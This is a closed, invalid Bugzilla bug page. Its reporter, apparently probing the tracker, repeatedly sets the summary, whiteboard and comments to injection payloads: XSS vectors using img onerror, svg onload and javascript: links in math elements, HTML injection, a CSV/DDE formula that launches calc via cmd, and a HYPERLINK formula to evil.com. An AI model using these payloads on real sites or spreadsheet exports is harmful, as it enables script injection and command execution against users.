Closed
Bug 1568431
Opened 6 years ago
Closed 6 years ago
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com " xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
Categories
(Invalid Bugs :: General, enhancement)
Invalid Bugs
General
Tracking
(Not tracked)
RESOLVED
INVALID
People
(Reporter: what3verbugcrowd, Unassigned)
References
()
Details
(Whiteboard: ":";-3+3+cmd|' /C calc'!D2)
| Reporter | ||
Updated•6 years ago
|
Summary: ":";-3+3+cmd|' /C calc'!D2 → =1+1
| Reporter | ||
Updated•6 years ago
|
Summary: =1+1 → ":";-3+3+cmd|' /C calc'!D2
| Reporter | ||
Updated•6 years ago
|
Summary: ":";-3+3+cmd|' /C calc'!D2 → =HYPERLINK("http://evil.com", "EVIL")
Whiteboard: ":";-3+3+cmd|' /C calc'!D2
=HYPERLINK("http://evil.com", "EVIL")
| Reporter | ||
Comment 2•6 years ago
|
||
[{"insert":"\n"},{"insert":{"embed-external":{"data":{"type":"link","url":"http://localhost","name":"name","body":"body","photoUrl":"photourl'onerror=alert(1) '","timestamp":"time"onmouseover=alert(2) "","humanTime":"humentime"}}}}]
| Reporter | ||
Comment 3•6 years ago
|
||
<img src=x onerror=alert(0);>
| Reporter | ||
Comment 4•6 years ago
|
||
"><img src=x onerror="alert(document.domain)">
| Reporter | ||
Comment 5•6 years ago
|
||
<svg><animate xlink:href=#x attributeName=href values=https://google.com /><a id=x><rect width=100 height=100 /></a>
| Reporter | ||
Comment 6•6 years ago
|
||
<marquee behavior="scroll" direction="left">HTML_Injection</marquee>
| Reporter | ||
Updated•6 years ago
|
Summary: =HYPERLINK("http://evil.com", "EVIL") → <svg/onload = alert(1);>
| Reporter | ||
Updated•6 years ago
|
Summary: <svg/onload = alert(1);> → <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
Updated•6 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Component: Untriaged → General
Product: Thunderbird → Invalid Bugs
Resolution: --- → INVALID
Version: 5.0 → unspecified
You need to log in
before you can comment on or make changes to this bug.
Comment 1
•